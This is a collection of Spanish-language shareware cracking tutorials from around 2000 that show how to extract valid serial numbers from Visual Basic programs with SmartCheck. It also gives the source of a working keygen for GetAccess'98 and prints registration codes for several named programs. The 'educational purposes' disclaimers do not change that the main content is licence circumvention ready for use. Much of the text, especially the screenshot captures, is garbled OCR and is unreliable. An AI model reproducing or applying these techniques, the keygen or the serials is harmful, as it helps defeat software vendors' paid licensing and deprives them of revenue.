AL ATAKE 2??? 


1- Al ejecutar el programa vemos que es una versión con límite de tiempo, pero que nos da la 


posibilidad de registrarlo. 


2- Con SM debidamente configurado, Cargamos el programa y lo ejecutamos ( run ). Salen 
mensajes de error, pero que no importan seguimos adelante dandole a acknowledge tantas veces 
como sea necesaria. Una vez ya cargado, nos vamos a la ventana de registro para introducir 
un serial cualquiera. Como seguro de que no vamos a acertar nos sale el mensaje de error.lLe 
damos a Ok y salimos. Como todo esto ya lo ha "monitorizado" el SM podemos, desde éste, 
parar el programa objetivo ( stop ). 


3- Vemos en el SM todos los eventos que se han producido, por alguna parte debe estar cuando 
nos da el mensaje de error al intentar registrarlo. 


4- En Visual Basic, la función para comparar 2 sentencias es _vbastrcmp , lo mas seguro es 
que se ha usado esta función para comparar el serial chungo y el verdadero. Hacemos que el 


SM busque la cadena vbastrcmp ...... 


5- Hemos encontrado la 1? pone: ..... returns Dword:00000, le damos y no aparece nada 
sospechoso. Encontramos una 2* pone: ..... returns Dword:ffffffff, le damos y, si aparece 
nuestro codigo malo junto con otra cadena de caracteres===> será ese el serial correcto? LO 
APUNTAMOS. Le damos a seguir buscando, y encuentra una 3*? pero es semejante a la 1*?, no nos 
sirve. 

6- El serial encontrado, será el correcto?, vamos a comprobarlo, cuando lo introducimos en 


el programa nos da las gracias por registrarnos, jJejJe.. 


NOTA 1: Primero decir que esto es para el estudio de la protección del programa, para poder 
evaluarlo mejor, y que si os gusta, debeis comprarlo! ;-) 


NOTA 2: Cuando se encuentra en una comparación de esta manera, y también en algún valor del 
registro en el SoftlIce, la cadena FFFFFFFF suele representar a nuestro codigo chungo!. 


sobre 
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Karpoff Spanish Tutor 


Programa: GetAccess'98 ver. 2.05 


PROTECCION: Name/Serial Number. 


Programa para desestablecer password de archivos .MDB € Permisos 


Descripcion: z Ecis 
P de Usuario. También muestra el password. 


Dificultad: Novato, Facililla, Media, ETC. 


http://ashishsystems.com 


Herramientas: Numega SmartCheck 6.03, W32Dasm v8.9, Visual Basic 6 


+ 
bl 
la] 
(2) 
u 
0) 
la] 


INTRODUCCION 


Tipico programa realizado en Visual Basic, con un sistema "maravilloso" de protección, de estos programas 
podemos aprender de como NO se deben realizar los algoritmos de protección (forma educada y cortes de 
decir, vaya "mierda" de protección). Por favor, un consejo aunque sea la persona menos indicada para darlos, 
pero que dichos programadores se dediquen mejor a programar Lavadoras y no hacer estas protecciones. 


Ya se que actúalmente estamos en una sociedad materialista, y que nos movemos por el dinero, blah, blah, ... 
pero sobre todo hay que ser PROFESIONALES!!! 


Perdón por este pequeño arrebato de indignación y panfleto liberal. 


Bueno, nos relajamos un poco. Antes de comenzar el atake, hay que tener claro, las herramientas que vamos 
a emplear, en esta "Víctima" emplearemos el maravilloso programa de Numega - SmartCheck ver. 6.03, para 
obtener el ansiado "KEY NUMBER" o Número de Serie. 


Pues, nada vamos al aaaaaattttttaaaaaaaakkkkkkkkeeeeee 


AL ATAKE 


Cargamos SmartCheck y dentro del programa lanzaremos el programa "victima" en nuestro caso, el GetAccess'98. Voy a 
incorporar gráficos para mostrar mejor el funcionamiento del SmartCheck. Primero, desde la opción File/Open cargaremos 
nuestra "victima" una vez ya cargada, existen dos formas de lanzar la "victima" bien, desde la opción Program/Start o pulsando 
[FS]. Una vez dentro de él nos vamos a la opción Help/Register. 


Entramos como USER NAME: ERESER y como KEY NUMBER: 999666999 


=. GetAccess'98 Registration Al ES 


Registration Information 


USER NAME: [ERSER 
KEY NUMBER: [99ase599d 


Partiendo, de nuestra intuición y sabiduría, y sobre todo, nos los muestra el SmartCheck, el KEY NUMBER es del formato 
siguiente: AC98-XXXXX-AB043BX ¡vamos, a la caza del KEY NUMBER! 


%; NuMega SmartCheck - [Getaccess98.exe - Program Results] 


File Edit View Program Window Help 


aa male sal o 


vbaStiwaWalVáARIANT:String:"R") returns DWORD:422EDC 
%  —WideCharToMultiBytefunsigned int-0O0000000, FL4GS:00000000, LPw*S 
$% Asc retums Integer:82 
$  _ vbaFreeSti[LPBSTR:0064E898) returns DW'DRD:0 
¡a SysFreeStrino[BSTR:00422EDC] 


% — HeapSize[HANDLE:00420000, FLAG S:DODOD000, PTR:00422ED8) retu 
%  —SysFreeString 
_vbaVarFordextVARIANT:Integer:6, PTR:0064E82C, PTR:0064E81C] rel 
$  —_ vbaStiCatíString:"-", String:"'4C398") 
%  —SysállocStringByteLeníchar “00000000, DwW'ORD:00000004) returns LP 
— vbaStrCat returns DWORD:422EDC 


$  —VaBstiFromi4(long:16416, LCID:OOODOCOS, FLAGS:00000000, LPBSTR 
% — Heapálloc[HANDLE:00420000, FL4GS:00000000, DWDRD:O00000” 
$  —VaBstiFromid retums HRESULT:0 


y __vbas tiMove(String:"1 6416", LPBSTR:0064E 894) retums DWDRD:422El 


Introducimos el texto a buscar: ERCOSER e iremos traceando hasta encontrar el supuesto KEY NUMBER válido, pulsando 
[F3] nos posicionara en la siguiente, así hasta que observamos algo muy curioso. 


Después de ir cargando caracter a caracter, nuestro USER NAME "ERGCSER", vemos unas líneas más abajo, lo siguiente : 


-Realizar KeyGen en Visual Basic- 


Primeramente hay que tener una serie de cosas claras, tenemos que conocer perfectamente y remarco perfectamente de que 
¡hace la rutina de generación. 


Y os preguntareis, como?, pues con buenas herramientas, paciencia y sobre todo, "materia gris". 


Partiendo de que disponemos de la herramienta-SmartCheck, cargaremos de nuevo nuestra "victima" e iremos introduciendo 
¡en el USER NAME, por ejemplo: "A", cuyo código Ascii es 65, es decir, Asc("A")=63, observamos que nos devuelve un 
[número Long(2592), lo anotamos en un papel. 


Repetimos el proceso anterior, pero esta vez introducinos "B", Asc("B")=66, y nos devuelve un número Long(2628), etc ... 


Recapitulemos: 

Asc("A")= 65 --> Long(2592) 
Asc("B") = 66 --> Long(2628) 
¡Asc("C") = 67 --> Long(2664) 


para obtener el número Long, debemos sumar al valor ascii del caracter +7 y multiplicarlo por 36. 
' Nombre : GetAccess Keygenerator 

' Autor : +ErOser'2000 (fOR tHE nEW mILLENNIUM] 

' Creado : Martes, Septiembre 27,2000 E 8:31:22 pm (Vers: 1.0.0000) 

' Herramientas: Numega SmartCheck 6.03, W32Dasm 8.93, Visual Basic 6 


' Descripción : Get Access 98 ver. 2.05 


Private Sub Text1_Change() 
'user_name quitamos blancos y lo restringimos a 10 
user_name = Trim$(Text1.Text) 
user_name = Mid$(Text1.Text, 1, 10) 
L = Len(user_name) 
key =0 
For x = 1 To L 
user_name = Asc(Mid$(Text1.Text, x, 1)) 
key = key + user_name 


Next x 
key = key +7 
| key = key * 36 


'Muestra en la caja de texto (Text2), el KEY NUMBER correspondiente al texto en Text1 
Text2.Text = '"'AC98-" « key € '-AB0431B1" 
End Sub 


[Kg-Ga98.Zip - Código Fuente del KeyGen 


Un Saludo! 


+ErOser'2000 
fOR tHE nEW mILLENNIUM 


¡Aquí! nos ha generado un número al tratar el USER NAME "ERESER” (caracter a caracter) --> "AC98-16416" 


_vbaStrMove(String:''AC98-",LPBSTR:0064E898) 


Long(16416) --> String 


String("'16416"') 


Observamos que realiza una concatenación con String("AC98”), String("-"), String("16416"). Es decir, 
_vbaStrCat(String:''AC98", String:'"-", String:''16416"') 


y el resultado lo mueve a una cadena _vbaStrMove(String:'AC98-16416-AB043B") 


%; NuMega SmartCheck - [Getaccess98.exe - Program Results] 


File Edit View Program Window Help 
32 a per ala sal o 


_ vbaFreeSti[LPBSTR:0064E8B0] 
$  —SysFreeStrino[BSTR:00423700] 

% — HeapSize[/HáNDLE:00420000, FLAG S:DODOO000, PTR:004236FC] returns DW*OF 
%  —SysFreeString 

— vbaFreeStr returns DWORD:20 

_ vbaFreeSti[LPBSTR:0064E848] 
%  —SysFreeString[BSTR:00520254] 

% — HeapSize[HáNDLE:00420000, FLAGS:O0000000, PTR:00520250) retums DWOF 
$  SysFreeString 

— vbaFreeStr retums DWORD:30 

_vbaFreeSti[LPBSTR:0064E89C] 
$  —SysFreeSting[BSTR:00422F04) 

% — HeapSize[/HáNDLE:00420000, FLAG S:00000000, PTR:00422F00) retums DWOF 
%  —SysFreeString 
_vbaFreeStr retums DWODRD:20 


ES 


String ('"1''] 
_vbaStiMove(String:*"1", LPBSTR:0064E£ 918) returns DWDRD:422EDC 


%  —SysállocStringByteLen[char *:DODO0000, DwORD:00000026) returns LPWOID:52025 
_ vbaStrCat retums DWDRD:520254 
_vbaStiMove(String:"A4098-164...", LPBSTR:0064E914) returns DWDRD:520254 


Seguidamente, realiza un bucle "For x = 1 To LEN(KEY_NUMBER)", dependiendo del tamaño de caracteres que tenga 
nuestro KEY NUMBER, en mi caso 9 caracteres "999666999". Concatenando a la cadena el valor númerico de x como 
caracter, ( si x= 1 entoces añade "1", y así sucesivamente). 


Observamos, que con la 1? concatenación realiza la comparación con el KEY NUMBER, este será nuestro ansiado KEY 
NUMBER Válido para nuestro USER NAME. 


_vbaStrCmp(String:'AC98-16416-AB043B1", String:'"999666999"") 


GETACCES598.EXE!00014753 (no debug in 


0 


unsigned short * stringl = 00520254 
=["4098-16416-4B043181" 
unsigned short * string2 = 00421480 


=["999666999" 


Fácil, nooo ;-)! Espero haberme explicado bien y sin enrollarme demasiado. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


Karpoff Spanish Tutor 


Alhademic Tetrix Pro V 1.0 


PROTECCION: Limitacion de Tiempo (10 días) 
sti Encontrar un número de serie válido, aprender desprotecciones en 
3 Ñ Visual Basic usando SmartCheck 
Alhademic Tetrix Pro es uno de los muchos clones disponibles del 
famoso y conocido juego TETRIX. Pero 
la versión de Alhademic está muy bien lograda, viene con una gran 
Descripcion: cantidad de opciones y por suerte los 
programadores no se olvidaron de los usuarios de otros países ya 
que este soporta 9 idiomas (por suerte 
incluyeron el español). 
Dificultad: Novato 
DOWNLOAD: www.alhademic.com 
Herramientas: SmartCheck v6.03 y ProcDump vl1.6.2 
CRACKER: Act Mago FECHA: 25/10/2000 
introduccion 


este es mi segundo tutorial, por lo que si no entienden algo sólo pregúntenlo 
actmago (O hotmail.com, por supuesto que sólo preguntas referentes a este tutorial y 


no pedidos u otras cosas. 

este tutorial te mostrará lo fácil que es encontrar un número de serie válido para este 
programa. el único problema es que el programa está hecho en visual basic, pero eso 
se soluciona con el smartcheck. espero que tengas instalado el smartcheck y sepas lo 
que es y como se usa. si no lo tienes puedes descargarlo de www.crackstore.com. si 
eres un cracker con cierto recorrido espero que ya hayas parado de leer este tutorial, 
y vayas a buscar el número de serie por ti mismo, porque es demasiado fácil, sólo 
consiste en buscar. : ) 

hey !! se me olvidaba decirles que este texto ha sido escrito sólo con propósitos 
educacionales. 


al atake 


ok, llegó la hora de cazar...un número de serie : ). 


abrimos el programa y aparece esto... 


E Alhademic Tetrix Pro 


Unregistered version. Day 1 of trial period. 


If you would like to use Ahademic Tetriz Pro without any limits, 
recejwe technical support and free new versions of the game please 
register. 


Registration of Alhademic Tetrix Pra can be conducted via 
ReaNow or Sharelt. 


Internet orders from Secure Servers: 
Registration fee: $12 


ETA + MA 
Enter Code | Help | oK | 


como es obvio estos tipos no quieren que se nos olvide que no estamos registrados. 

damos click en enter code, luego insertamos nuestro nombre y cualquier número de serie, damos 
click en ok y el programa desplegará el típico mensaje de registro falso: sorry, but your registration 
code is invalid (no cierres el programa aún). bueno, como no sabemos aún en qué lenguaje está 
hecho, vale la pena saberlo para saber qué haremos más adelante.uso el file analycer pero dice 
"unknow” o desconocido, como tengo dudas y me huele que está en visual basic uitlizaré el 
procdump para saber qué dll está usando el programa. supongo que no cerraste el programa como te 
lo indiqué arriba...doble click a procdump, busco el programa en la listade cargados y al hacerle 
click, más abajo te indicará los archivos dll que está usando: se verá así... 


¿' ProcDump32 (C] 1998, 1999. 2000 G-RoM. Lorian 4 Stone 


c:Larchivos de programatfrontpage expresstbintípxpress..... FFF178B7 00400000 O019E01 

c:4archivos de programat internet explorer tiexplore.exe FFF3580F 00400000 0001300 

c:4archivos de programa accesoriosimspaint.exe FFF3DESF 01000000  O00560( 

C FFF3EB43 00400000 OD0ESO! 

cMwindowsisystermimmtask.tsk FFFIB4EF 00000000 0000001 a 
ye) 
> 


ebmis doromentasimneflinakinredman? Fhnrardurmnn are FFF3R473  MM4DANÓAn nana 


c:4archivos de programa alhademic tetri... 7EA81FEB 
cMmwindows+systemtasycfilt. dl 7EABIFEC 
ctindows!systermwbbes. dll 7EA81FED 


c:wwindowsisystemimsvbwm50. dll ó 


» au z 
cwindows!systemtole32. dll 7EA81FIE 


7FF30000 — ODOCODOD há! 


msvbvm50.dll , nuestras dudas se han aclarado, ya sabemos qué hacer...en esta ocasión no vale la 
pena considerar o anotar el mensaje de registro falso y como el programa usa vb3, en este caso ya no 
pensamos en parchar, pensamos en encontrar un número de serie real. 


a continuación: 
cerramos: alhademic tetrix pro y procdump. 
abrimos: smartcheck. 


asumo que el smartcheck lo tienes bien configurado...vamos a file ---> open y cargamos el programa, 
es decir, el ejecutable: atetpro.exe y luego presionas aquí: 


debes tener paciencia si tienes un pentium con 100 como yo, después de esa espera aparece la misma 
imagen que está al inicio de este tutorial (te espero, ve a verla)... 


ahora presionamos enter code e introducimos nuestro nombre y cualquier serial ; como es obvio lanza 
el típico mensaje de registro falso, pero nosotros estamos tranquilos porque todo está quedando 
"registrado" en el smartcheck. 

ahora presionamos el botón rojo cuadrado que está al lado derecho del botón que te señalo arriba. 
para parar la entrega de datos. 


búsqueda larga (paciencia) 


el smartcheck recibió toneladas de datos en los cuales debemos sumergirnos para encontrar la 
comparación en donde se encuentra nuestro serial verdadero...es un largo buceo. lo que usualmente 
hago es ir a edit ----> find e insertar las primeras letras de mi nombre: act mag. sólo eso y el 
programa después de un instante lo encontrará...una vez que lo encuentra voy a edit --->find y coloco 
sysfreestring hasta encontrar algo parecido a un serial, primero hay varios "señuelos" hasta que 
encontramos una que parece verdadera : ) 


170482 E $e LCaselvARIANT:Sting:""D098704 4] | MSWBVMSO DLLIGOOFEEDS (no debug info] 
170489 SysFreeSting(BSTR:00000000) - 
170490 


170491 


+ E OOO 
z A El- unsignipelmebmeri=into RES 

O  ynlcstmgaraLeaicnar 009 =|'009b703393ca07d449Ebcdbfaf401533 

$  —SysFreeString[BSTR:DD000000) 

*t  SysFreeStina(BSTR:M0538578] ESTA DEBE SER 

17n493 - HeanSrealHHáNAI F-AM4ENAAA 

los números en la parte izquierda de la imagen pueden ser distintos en tu pc. 

hey !!, la búsqueda fue larga, pero sin paciencia nada se logra y aquí hemos encontrado un número 

de registro real, ahora lo único que debes hacer es anotar el número e insertarlo en la caja de registro 


con el mismo nombre que habías puesto antes, en mi caso: 
act mago again 


009b70a393ca07d44496bcdbfaf401533 


dar click en ok y verás esto... 


Alhademic Tetrix Pro 


Thank you for registration! 


programa crackeado... eso fue todo...bastante fácil no? 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmago O hotmail.com 


saludos 


saludos a tnt!. excelente página, muy buen trabajo... sigan adelante. ( especialmente a xasx, (no 
pararé : ) ) y profesor x.) saludos a toda la people de tutoriales2000. saludos al 1.d.a. (monofeo , flaco 
(pastero), chirda, taza, afo, solerman, nasal, peter y a todos los demás) 

saludos a todos los crackers del mundo. ¡¡chao !! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, 
pero recuerden: lean muchos tutoriales, practiquen, estudien, y crackear será mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Internet Angel V 3.04 (english version) 


El programa viene con libre uso de 30 días, y después de ese 
período debes registrarte 


Conseguir un código de registro válido 


Es un programa que busca y descarga archivos de internet como 
imágenes, sonidos, videos y más. El programa puede descargar los 
documentos HTML a tu disco duro para que puedas ver el web site 
sin estar conectado. 


super Novato 


http://home.t-online.de/home/rinder 
SmartCheck v 6.03 


Act Mago FECHA: 25/10/2000 


introduccion 


hola amigos, presento mi tercer tutorial. ya saben, si tienen alguna duda sólo pregúntenlo 
actmago hotmail.com , como siempre digo... sólo preguntas referentes a este tutorial y no pedidos u otras 


cosas. este tutorial está escrito especialmente para aquellos que saben poco o nada. como me encanta crackear 
programas que usan visual basic he decidido profundizar el uso de smartcheck y mostrar lo sencillo que es 
utilizarlo. supongo que a estas alturas ya sabes lo 

que es y cómo se usa y si no lo sabes ve y busca un tutorial. : ) no aquí te mostraré una pequeña pincelada 
sobre como se usa. si eres un cracker con cierto recorrido espero que ya hayas parado de leer este tutorial y 
busques el número de serie por ti mismo debido a que conseguir la clave de registro es demasiado fácil. : ) y 
para terminar con la intro debo decir : este texto ha sido escrito sólo con propósitos educacionales. 


al atake 


abrimos el programa y aparece una pantalla con la info del programa que dice: 

this product is licensed to: 

-unlicensed demo, click here for further information. 

haremos que eso cambie... le damos click a ok y por fin estamos en el programa. vamos al lugar 
que más nos interesa en todos los programas; por supuesto el lugar en donde metemos el código 
de registro, que sería aquí... 


Internet Angel (Unlicensed Demo) - C:Alnetat 
Ele View Special | 2 


Men iNE TA sean 
4 Eomplele/IcontinW 


tetas 


le damos click y aparece la caja para registrarse que nos pide tres datos: 


-nombre 
-ciudad o e-mail 
-código (el más importante : ) ) 


insertamos lo que sea, damos click en register y aparece esto en la parte inferior izquierda del 


programa...: 


Invalid registration datal 


comenzamos a indagar en el programa para ver si trae algo que nos pueda ayudar... 

y como es obvio, voy a la ayuda : ). doy click en system requirements y me encuentro con una 
sorpresa gratísima : ), el programa usa visual basic 5.0 y por lo tanto ya sabemos qué hacer. a 
continuación... 


cerramos: internet angel. 
abrimos: smartcheck. 


asumo que el smartcheck lo tienes bien configurado... vamos a file--->open y cargamos el 
programa, es decir, el ejecutable: ineta.exe y luego presionas aquí: 


470 A mos 


el programa comenzará a cargar, y cuando lo haga lo primero que debemos hacer es ir a la caja 
de registro y luego insertar nuestro nombre, e-mail o ciudad y nuestro número de la suerte... por 
supuesto el programa lanzará en la parte izquierda inferior del programa el mensaje de registro 
falso, pero nosotros debemos estar tranquilos porque todo está quedando 'registrado' en el 
smartcheck. para parar la entrega de datos en el smartcheck debemos presionar el botón rojo 
cuadrado que está al lado derecho del que te indica la imagen que está arriba. 


¡a buscar! 


el espectacular smartcheck recibió mucha información, en la que debemos buscar y buscar para 
encontrar el código. lo que usualmente hago para ahorrarme una búsqueda en toneladas de 
basura y una pepita de oro (nuestro código verdadero) es esto... 

voy a edit--->find y luego inserto mi nombre completo: act mago. el programa encontrará mi 
nombre luego de un instante y cuando este lo haga insertamos nuestro número de registro falso 
1233321 y damos click en find. el programa lo encontrará en unos cuantos segundos y cuando 
lo haga debemos ser cautelosos para no fallar... mucho pero mucho más abajo vamos viendo 
unas comparaciones sospechosas hasta que encontramos una que es realmente sospechosa y que 


nos indica que el código que buscamos es ese...: 


%  —SysFreeStina[BSTR:0055E0D8]) a] 
%  —SysFreeStina[BSTR:00534810) 
. 


SysFreeStrino(B STA:00535054) Mi número falso sil Salgo Hdi 
3321" String; 911H-28...'"] retums DWDRD:1 E unsigned short * stina? = 00633030 


=11911H-782" Muy 


— vbaStiFixstrD'WORD:00000002, PTR:004F4764) retums DWORD:533164 
sospechoso 


INETA.EXENODOS4DFS [no debug info) 


a E El 


+. 

%  —_ vbaStiMove(String:"ok", LPBSTR:0074E8F4) retums DWORD:533164 
$  _ vbaStiEmpístina:"pr”, String: "ok'""] returns DWDRD:FFFFFFFF 
. 

ES 


E 


_ vbaFreeSti[iLPBSTR:0074E8F4) returns DWDRD:20 
% LSetílong:2. PTR:004F4764, PTR:00419184) 


- 


anotamos el código, cerramos el smartcheck, abrimos internet angel, vamos a la caja de registro 
y luego insertamos los datos de la misma forma en que lo habíamos hecho antes, y por supuesto 
sólo variando el code, en mi caso: 


name: act mago 
city/e-mail: actmagoO hotmail.com 
code: 1911h-782 


damos click en register y boom !! 


Registeredl 


programa crackeado. 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmago Ohotmail.com 


saludos 


saludos a tnt!. excelente página, muy buen trabajo...sigan adelante. ( especialmente a xasx, (no 
pararé : ) ) y profesor x.) saludos a toda la people de tutoriales2000. 

saludos al 1.d.a. (monofeo , flaco (pastero), chirda, taza, afo, solerman, nasal, peter y a todos los 
demás). saludos a todos los crackers del mundo. 

chao !! 

espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus 
habilidades, pero recuerden, lean muchos tutoriales, practiquen, estudien y crackear será 
mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programas: Todo el software de Marilis 


PROTECCION: Serial limitación de usos 
Descripcion: Juegos para niños 
Dificultad: Newbie 


DOWNLOAD: http://www.marilis.com/ 
Herramientas: File insPEctor, Smartcheck 


CRACKER: dek_O0in FECHA: 28/10/2000 


introduccion 


tan solo ha pasado 1 dia después de que escribo el último manual. pero bueno, aquí un tutorial sobre como obtener 
el serial válido para todos los productos de esta compañía que por cierto, son todos juegos para niños. tomaremos 
como ejemplo el juego cookiz, es como un puzzle medio raro. 


al atake 


ejecutamos el cookiz y vemos que ya nos da la bienvenida con una linda nag: 


cookiz is a shareware. 
the free version has 18 puzzles 
registration for the full 63-puzzle 


version is $10.00 


at: www.marilis.com 


your id : 5ll6r41hj 
please enter your registration key: 


123456789 


later ok 


lo que es interesante es el id que nos da. si nos registraramos de verdad, tendríamos que mandarle este id a la compañía 
para que nos den el serial. ¿que quiere decir esto?, que nuestro serial será generado a través del id que nos muestre el 
programa. este id cambia cada vez que instalamos el programa o cada vez que borramos la información del registro de 
hkey_current_usen softwarelcokr codel. ahí hay una clave llamada numberl. en este momento mi id es 5Il6r41hj pero si 
quiero lo puedo cambiar a 123456789 para pasarle el serial a un amigo, con algunas instrucciones de lo que tiene que hacer. 


el lugar para poner nuestro serial nos da una pista, no nos deja poner más de 9 caracteres por lo que pienso que deberá ser 
la longitud de nuestro serial. otro error de los programadores. ahora ya tenemos bastantes pistas así que a crackear!, 


antes que nada analizamos el ejecutable de cookiz.exe con el file inspector y obtenomos la siguiente información: 


no está empakado 

ni encryptado 

obtenemos una lista de las funciones importadas/ exportadas del programa 
msvbvm60.dll 

está hecho en visual basic 


el programa está hecho en vb, por eso es que ocupa tanto espacio. por suerte para crackear programas en visual basic existe 
una genial herramienta también de numega, el smartcheck. cerramos el cookiz y ejecutamos el smartcheck. file/open y 


seleccionamos el exe de cookiz. le damos al botón de 0 para que empieze la ejecución del programa y podemos ver que 


está lleno de errores, para que el programa continúe su ejecución solo debemos presionar el botón de acknowledge hasta 
que el programa se ejecute. 


bien, escribimos cualquier cosa de registration code, pulsamos ok y luego salimos del programa. esta vez no haremos lo típico 


de apretar el botón Sl sino que dejaremos apretado e EE a] para que el smartcheck nos muestre los errores y los eventos 
específicos. ahora exploraremos esto un poco. bajen hasta llegar a esta zona: 


$% ¿Asc retums Integer:53 se ve interesante. recuerdan cual era nuestro id, pues era 5ll6r41hj y lo más curioso es esto: 
$*% Chr 

$ . 
pá Mid ascii: caracter: 
$% Asc retums Integer: 76 
$ Chr 53 5 
$% Mid 76 1 
$% ¿Asc retums Integer:76 76 1 

9. 
$*% Chr 
9% Mid 34 6 
$% Asc retums Integer:54 82 r 
$% Chr 52 4 
$% Mid 49 1 
e ¿Asc retums Integer:82 7 h 
$% Chr 74 ; 
+ Mid J 
$% Asc retums Integer:52 ) 
$% Chr ya no tenemos mas dudas de que estamos en una zona muy interesante. además si nos paramos 
$ Mid sobre algún mid veremos nuestro id. si vemos bien, bajo el número 74 hay algo así: 
$% ¿Asc retums Integer:49 
9% Ch $% ¿Asc retums Integer:74 
$% Mid $% Chr 
$% Asc retums Integer:72 $% Trim 
Só Chr 
9% Mid $% Trim 
$% ¿Asc retums Integer:74 


$% Chr nos paramos sobre el primer trim y vemos algo como "test". nos paramos sobre el segundo trim y 
vemos esto: 


string [variant] 

unsigned short * * pbstry al = DOBDFBE4 

=- String = DD4CC9BO 
="766044540" 


este es un número raro, si nos paramos sobre el tercer trim veremos nuestro id. escribamos el número raro en la casilla de 


ahorró mucho trabajo. 


por supuesto que este tutorial fue creado solo con fines educativos y que yo no puedo hacerme responsable del uso que se le 
pueda dar a este material. si te gusta el software de esta compañía debes comprarlo y no robarlo!. 


Saludos a: 


todo [k-for] 
xXasx 

act mago 
karpoff 

mr. mauve 
[the pope] 


página oficial del grupo k-for:_ http: //pagina.de/kfor 
mi dirección de e-mail: dek ointdhotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, 


sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Vault (build 2 revision 3) 

PROTECCION: Name / Serial. 

Objetivo: Conseguir un código de registro válido. 

Descripcion: Programa que sirve para guardar los passwords. 

Dificultad: Newbie. 

DOWNLOAD : http://www.vault.uni.cc 

Herramientas: File insPEctor v3.0 y SmartCheck v6.03. 

CRACKER: Act Mago FECHA: 26/11/2000 
INTRODUCCION 


hola amigos, presento mi duodécimo tutorial. ya saben, si tienen alguna duda sólo pregúntenlo 

actmagoO hotmail.com, como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u 
otras cosas. en este tutorial volveremos a usar el smatcheck. si no lo tienes instalado puedes bajártelo en 
www. crackstore.com . asumo que tienes conocimientos básicos sobre su uso. y para terminar con la intro debo 


decir : este texto ha sido escrito sólo con propósitos educacionales. 


profe, está es la confusión del chat jaja!! :) saludos amigo !! 


al atake 
comentario del programa 


el programa es shareware, tiene libre uso de 7 días, por lo que si quieres seguir usándolo después de este período debes 
registrarte y para eso debes pagar la suma de $10.00 us 


contamos con smartcheck... 


manos a la obra 


abrimos el programa y enseguida nos aparece un cuadro indicándonos los días que nos quedan de prueba; en el mismo 
cuadro está la opción para registrar el programa la que dice register vault, le damos click y nos aparece una caja de 
registro como esta: 


The lock will open with the correct Key 


7 days left in the trial period 


la caja no tiene botón de registro y además nos dicen:la cerradura se abrirá con la clave correcta. 


a continuación. ..cerramos vault. 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v3.0 el que nos mostrará los siguiente datos: 


el programa está desarrollado en microsoft visual basic 5 
no está encriptado 

no está empacado 

msvbvm50.dll 


con la información que tenemos creo que el camino más fácil y limpio será usar nuestro querido smartcheck para conseguir 
un código de registro real. 


a continuación. ..cerramos file inspector v3.0. 


usando smartcheck 


asumo que tienes bien configurado el smartcheck y que tienes al menos conocimientos básicos sobre su uso. 


a continuación. ..abrimos smartcheck y vamos directamente a la opción file --->open y abrimos el ejecutable del 
programavault.exe, luego presionamos f5 y esperamos a que el programa cargue y cuando lo haga insertamos en caja de 
registro nuestro nombre y nuestro código de registro, y cuando lo hayamos hecho esperamos un momento y le damos click a 
end o al cuadrado rojo. 


buceando 


ahora en el smartcheck nos encontramos solamente con esto: 


$ Arramure: Mery ersiont xa Terumeo UXULLUUJUUU 
$ Listing Load 


w ABI failora: Eraal ibraro rahrrad NEAAMANARA 


le damos click y caerá una enorme cadena de datos, vamos hasta el final y ahí se puede ver esto: 


Splash (Form) created 
Splash_Load 

Splash. Show 
Listing_Unload 


as ¿ymoa 


E E E 


le damos click al + de splash_ load y no hay nada importante, luego al + de splash.show y vemos una gran cantidad de 
cadenas, y ahí hay unas cuantas que me parecen familiares... 


HP ¡Key Change 
Hg ¡Key Change 
HE ¡Key Change 
HP ¡Key Change 
HE ¡Key Change 
EP ¡Key Change 
Hg ¡Key Change 


le damos click a la primera ikey_ change y nos desplazamos hasta el final para ver esto... 


Ela ¡Key Text 
Ela ¡Key Text 
Ela ¡Key Text 
Ela ¡Key Text 
e Note.ForeColor < 
Ehe Note Caption <-- 
Ela ¡Key Text 
Ela ¡Key Text 


Si 
le damos click encima a la primera ikey.text para que quede marcada de azul, ahora le damos click a El para ver todos 
los eventos y vemos esto...ojo 


$  SysFreeStinglBSTR:005301D0) 
9% TextBox:Release[LPINTERFACE:029EDD70) retums DWOF 
$% TextBox:4ddRefLPINTERFACE:029EDD70) returns DWDR 
+ Ela ¡Key Text 
$  —SysállocStingLen(PTR:00434508, DWw'ORD:00000008) return 
$  — SysFreeString[BSTA:D00000000) 
HS  SysFreeSting[BSTR:005301D0] —=código falso (parte) 
HS  SysFreeSting(BSTR:00435440) ——>código real 
9% TextBox:ReleasellPINTERFACE:O24egistro total. 
9% TextBox:4ddRefLPINTERFACE:029 OR 
la ¡Key Text 
$  —SysállocStingaLen(PTR:0043451C, DW'ORD:D00000004] returr 
$  —SysFreeSting[BSTR:00000000] 
$  SysFreeSting(BSTR:005301D0)-—->código falso (parte) 
$  —SysFreeSting[B5TR:00435440) ——=>código real para 
90 TextBox:Release(LPINTERFA E Atender el trial 2 
99 TextBox:AddRef(LPINTERFAC oo 
+ (Ea ¡Key Text 
$  —SysállocStingLen[PTR:00434530, DW'DRD:00000004) return 
$  —SysFreeSting[BSTA:D00000000) 
$  SysFreeSting/BSTR:005301D0)--->código falso (parte) 
$  —SysFreeStina[BSTR:00435440) -——=>código real para 
99 TextBox:Release(LPINTERFA*tender el trial 2 meses 


1! 


te 


te EH 


lo tenemos, y tenemos tres, pero sólo uno es el que buscamos ya que los otros 2 son para extender el trial, y por supuesto 
usaremos el que dicecódigo real registro total, en mi caso: 


name: act mago 


key:¡i3k9f9w1h8 
>>thank you for registering the vault 
registration complete! 
damos click en evaluation period y... nos aparece esto... 


Name: (Act MagO q 


